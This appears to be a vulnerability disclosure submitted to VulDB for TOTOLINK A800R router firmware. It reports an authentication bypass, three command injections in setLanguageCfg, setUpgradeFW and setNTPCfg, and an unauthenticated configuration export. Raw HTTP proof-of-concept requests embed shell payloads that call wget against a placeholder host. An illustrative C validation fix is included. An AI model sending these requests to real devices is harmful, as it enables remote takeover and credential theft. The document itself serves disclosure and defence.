| Title | Totolink A8000R V5.9c.681_B20180413 Improper Authentication |
|---|
| Description | # TOTOLINK A800R V5.9c.681 - Multiple Vulnerabilities Report
## Vulnerability 1: Authentication Bypass in cstecgi.cgi
**Type:** Authentication Bypass (CWE-306)
**Severity:** Critical (CVSS 9.8)
**Product:** TOTOLINK A800R
**Firmware:** V5.9c.681_B20180413
**File:** /cgi-bin/cstecgi.cgi
### Description
The TOTOLINK A800R V5.9c.681_B20180413 router has an authentication bypass vulnerability. The cstecgi.cgi handler does not verify session cookies or authentication tokens. An unauthenticated remote attacker can send POST requests directly to /cgi-bin/cstecgi.cgi and invoke any setting function without logging in.
### Proof of Concept
```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <target>
Content-Type: application/json

{"topicurl":"setting/setLanguageCfg","langType":"test"}
```
The server returns `{"success":true}` without any authentication.
---
## Vulnerability 2: Command Injection in setLanguageCfg
**Type:** OS Command Injection (CWE-78)
**Severity:** Critical (CVSS 9.8)
**Product:** TOTOLINK A800R
**Firmware:** V5.9c.681_B20180413
**File:** /lib/cste_modules/global.so
**Function:** setLanguageCfg
### Description
The setLanguageCfg function in global.so takes user input from the `langType` parameter, formats it into a command string with `sprintf("flash set LANGUAGE_TYPE %s")`, and executes that string with `CsteSystem()` (equivalent to `system()`) without any input sanitization. Combined with Vulnerability 1 (authentication bypass), this allows unauthenticated remote code execution.
### Proof of Concept
```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <target>
Content-Type: application/json

{"topicurl":"setting/setLanguageCfg","langType":";wget http://<dnslog>;"}
```
---
## Vulnerability 3: Command Injection in setUpgradeFW
**Type:** OS Command Injection (CWE-78)
**Severity:** Critical (CVSS 9.8)
**Product:** TOTOLINK A800R
**Firmware:** V5.9c.681_B20180413
**File:** /lib/cste_modules/upgrade.so
**Function:** setUpgradeFW -> dl()
### Description
The dl() function in upgrade.so constructs a command using `sprintf("wget -O %s %s", FileName, DlFileUrl)` and passes it to `CsteSystem()` without sanitizing user input. The `FileName` and `DlFileUrl` parameters are attacker-controlled. Combined with Vulnerability 1, this allows unauthenticated remote code execution.
### Proof of Concept
```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <target>
Content-Type: application/json

{"topicurl":"setting/setUpgradeFW","FileName":";wget http://<dnslog>;"}
```
---
## Vulnerability 4: Command Injection in setNTPCfg
**Type:** OS Command Injection (CWE-78)
**Severity:** High (CVSS 8.8)
**Product:** TOTOLINK A800R
**Firmware:** V5.9c.681_B20180413
**File:** /lib/cste_modules/system.so
**Function:** setNTPCfg
### Description
The setNTPCfg function stores the user-supplied `NTPServerIP` parameter in nvram and then calls `CsteSystem("sysconf ntp")`. The ntp.sh script reads `NTPServerIP` back from nvram and passes it unsanitized to shell commands, enabling command injection.
### Proof of Concept
```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <target>
Content-Type: application/json

{"topicurl":"setting/setNTPCfg","NTPServerIP":"$(wget http://<dnslog>)","NTPSync":"24","NTPClientEnabled":"ON","time_zone":"UTC+0"}
```
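Input validation of the kind missing for `langType` (Vulnerability 2) and `NTPServerIP` (Vulnerability 4), added here as an example; it is not code from the vendor firmware or from the reporter's repository. The function names, the accepted character sets and the length limits are assumptions, and the sample inputs in `main` are constructed from the payload shapes shown in this report.

```c
#include <stdio.h>
#include <string.h>

/* Assumed policy: a language code is 2-8 lowercase ASCII letters. */
int valid_lang_type(const char *s) {
    size_t n = s ? strlen(s) : 0;
    if (n < 2 || n > 8) return 0;
    for (size_t i = 0; i < n; i++)
        if (s[i] < 'a' || s[i] > 'z') return 0;
    return 1;
}

/* Assumed policy: hostname or IPv4 literal made of letters, digits,
 * '.' and '-' only, so no shell metacharacter can reach ntp.sh. */
int valid_ntp_host(const char *s) {
    size_t n = s ? strlen(s) : 0;
    if (n == 0 || n > 253 || s[0] == '-' || s[0] == '.') return 0;
    for (size_t i = 0; i < n; i++) {
        char c = s[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '-';
        if (!ok) return 0;
    }
    return 1;
}

/* Builds the command only from validated input.
 * Returns 0 on success, -1 if the value is rejected or would be truncated. */
int build_lang_cmd(char *out, size_t outlen, const char *lang_type) {
    if (!valid_lang_type(lang_type)) return -1;
    int n = snprintf(out, outlen, "flash set LANGUAGE_TYPE %s", lang_type);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void) {
    /* Constructed inputs: one benign value and one payload shape per field. */
    const char *langs[] = { "en", ";wget http://<dnslog>;" };
    const char *hosts[] = { "pool.ntp.org", "$(wget http://<dnslog>)" };
    char cmd[64];
    for (int i = 0; i < 2; i++) {
        int rc = build_lang_cmd(cmd, sizeof cmd, langs[i]);
        printf("langType    %-26s -> %s\n", langs[i], rc == 0 ? cmd : "rejected");
        printf("NTPServerIP %-26s -> %s\n", hosts[i],
               valid_ntp_host(hosts[i]) ? "accepted" : "rejected");
    }
    return 0;
}
```

Validation of this kind addresses only the injection paths; the handler still needs the authentication check described as missing in Vulnerability 1.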
---
## Vulnerability 5: Information Disclosure via ExportSettings.sh
**Type:** Information Disclosure (CWE-200)
**Severity:** High (CVSS 7.5)
**Product:** TOTOLINK A800R
**Firmware:** V5.9c.681_B20180413
**File:** /cgi-bin/ExportSettings.sh
### Description
The ExportSettings.sh script exports the entire device configuration (config.dat), including WiFi passwords, admin credentials, DDNS settings, and all other sensitive information. The script contains no authentication check and can be accessed by any unauthenticated remote attacker.
### Proof of Concept
```
GET /cgi-bin/ExportSettings.sh HTTP/1.1
Host: <target>
```
Returns the full device configuration file.
---
## Timeline
- 2026-03-29: Vulnerabilities discovered
- 2026-03-29: Report submitted to CVE
## Credit
skeet
|
|---|
| Source | https://github.com/skeetabc/CVE-TOTOLINK-A800R |
|---|
| User | skeet (UID 96893) |
|---|
| Submission | 03/29/2026 17:15 (9 days ago) |
|---|
| Moderation | 04/06/2026 11:38 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 355503 [Totolink A8000R 5.9c.681_B20180413 /cgi-bin/cstecgi.cgi setLanguageCfg langType missing authentication] |
|---|
| Points | 20 |
|---|